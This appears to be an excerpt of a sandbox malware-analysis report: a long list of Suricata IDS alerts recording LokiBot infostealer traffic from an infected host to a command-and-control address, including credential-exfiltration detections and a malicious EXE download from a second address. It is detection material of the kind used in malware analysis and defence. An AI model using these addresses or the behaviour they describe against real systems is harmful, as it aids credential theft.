            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49737 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49737 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49742 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49734 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49734 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2022050 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 : 66.63.187.231:80 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49734 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49740
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49746 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49746 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49734 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49746
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49737 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49737 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49742
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49735 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49739
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49737
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49750 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49750 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49754
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58491 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49752 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49748
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49752
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58492 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2022051 - Severity 1 - ET MALWARE Likely Evil EXE download from dotted Quad by MSXMLHTTP M2 : 66.63.187.231:80 -> 192.168.2.4:49730
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58491 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58492 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58492 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58503 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58503 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58498 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58498 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58492 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58492 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58491 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49760
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58500 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58504 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58504 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58503 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58504 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58499 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58498 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58507 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58491 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58491 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58505 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58503 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58503 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58511 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58513 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58513 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58513 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58500 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58500 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49762
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58513 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58505 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58508 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58509 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58509 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58515 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58503
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58509 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58492
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58498 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58513 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58511 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58498 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58505 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58518 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58499 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58499 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58515 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58515 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58500 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58508 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58512 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49750
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58499 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58507 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58507 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58504 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58504 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58507 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58504
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58507 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58509 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58509 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58507
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58509
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58516 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58513
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58518 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58500 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58505 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58508 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58515 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58499 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49757
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58491
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58508 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58530 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49758 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58518 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58530 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58514 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58514 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58514 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58498
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58505 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49755
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58514 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58512 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:58500
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58559 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:58516 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58516 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:58493 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58511 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:58530 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49753
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58511 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58518 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:58518 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:58516 -> 94.156.177.41:80
